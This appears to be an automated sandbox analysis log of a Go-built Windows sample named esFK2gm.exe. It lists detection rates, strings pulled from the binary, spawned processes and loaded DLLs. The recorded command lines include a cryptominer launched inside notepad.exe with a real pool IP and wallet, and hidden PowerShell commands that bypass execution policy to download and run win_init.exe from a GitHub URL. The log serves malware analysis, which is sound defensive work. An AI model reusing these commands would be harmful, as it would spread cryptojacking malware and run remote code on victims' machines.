Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\esFK2gm.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: esFK2gm.exe | Virustotal: Detection: 22%
Source: esFK2gm.exe | ReversingLabs: Detection: 23%
Source: esFK2gm.exe | String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedgo package net: hostLookupOrder(chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largemime: expected token after slashbufio: invalid use of UnreadBytebufio: tried to fill full bufferuse of closed network connection" not supported for cpu option "unexpected character, want coloned25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyinput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbytes.Buffer.Grow: negative countpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qbytes.Reader.Seek: invalid whencerelease of handle with refcount 0too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length sync: 
RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangego package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangeskip everything and stop the walkempty hex number for chunk len
Source: esFK2gm.exe | String found in binary or memory: ReadProcessMemory[%v : %x]: [%v] %vSubscribeServiceChangeNotificationshttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00strings.Reader.Seek: invalid whencecrypto/md5: invalid hash state sizenetwork dropped connection on resettransport endpoint is not connectedexecutable file not found in %PATH%1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largefile type does not support deadline'_' must separate successive digitshash/crc32: invalid hash state sizetoo many Questions to pack (>65535)bigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferWriteProcessMemory[%v : %x]: [%v] %vjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodsstrings.Builder.Grow: negative countstrings: Join output length overflowTime.UnmarshalBinary: invalid lengthbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %v444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzmethod ABI and value ABI don't alignlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil
Source: unknown | Process created: C:\Users\user\Desktop\esFK2gm.exe "C:\Users\user\Desktop\esFK2gm.exe"
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\notepad.exe --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\win_init.exe "C:\Users\user\AppData\Roaming\win_init.exe"
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\esFK2gm.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\esFK2gm.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
